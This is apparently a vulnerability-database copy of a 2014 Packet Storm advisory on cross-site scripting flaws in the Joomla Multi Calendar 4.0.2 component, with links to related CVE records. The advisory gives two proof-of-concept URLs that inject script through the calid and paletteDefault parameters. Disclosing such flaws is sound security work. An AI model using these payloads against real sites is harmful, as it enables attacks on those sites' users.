Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMahmoud GhorbanzadehPACKETSTORM:125738
HistoryMar 15, 2014 - 12:00 a.m.

Joomla Multi Calendar 4.0.2 Cross Site Scripting

2014-03-1500:00:00
Mahmoud Ghorbanzadeh
packetstormsecurity.com
19

0.002 Low

EPSS

Percentile

60.4%

JSON
`Hello,  
  
Multiple cross-site scripting (XSS) vulnerabilities in Multi  
calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary  
web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault  
parameter to index.php.  
  
File: /tmpl/layout_editevent.php  
Lines: 161 and 481  
POC:  
http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>  
  
File: /tmpl/layout_editevent.php  
Line: 319  
POC:  
http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>  
  
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of  
Technology's Scientific Excellence and Research Centers.  
  
Best Regards.  
`

Related

cve 1
cvelist 1
openvas 1
nvd 1
seebug 1
prion 1
cve
cve
CVE-2013-5953
2014-03-19 14:17:44
cvelist
cvelist
CVE-2013-5953
2014-03-19 14:00:00
openvas
openvas
Joomla Component Multi Calendar Multiple Cross Site Scripting Vulnerabilities
2014-03-17 00:00:00
nvd
nvd
CVE-2013-5953
2014-03-19 14:17:44
seebug
seebug
Joomla! Multi Calendar组件跨站脚本漏洞
2014-03-19 00:00:00
prion
prion
Cross site scripting
2014-03-19 14:17:00

0.002 Low

EPSS

Percentile

60.4%

JSON
Related for PACKETSTORM:125738
cve1cvelist1openvas1nvd1seebug1prion1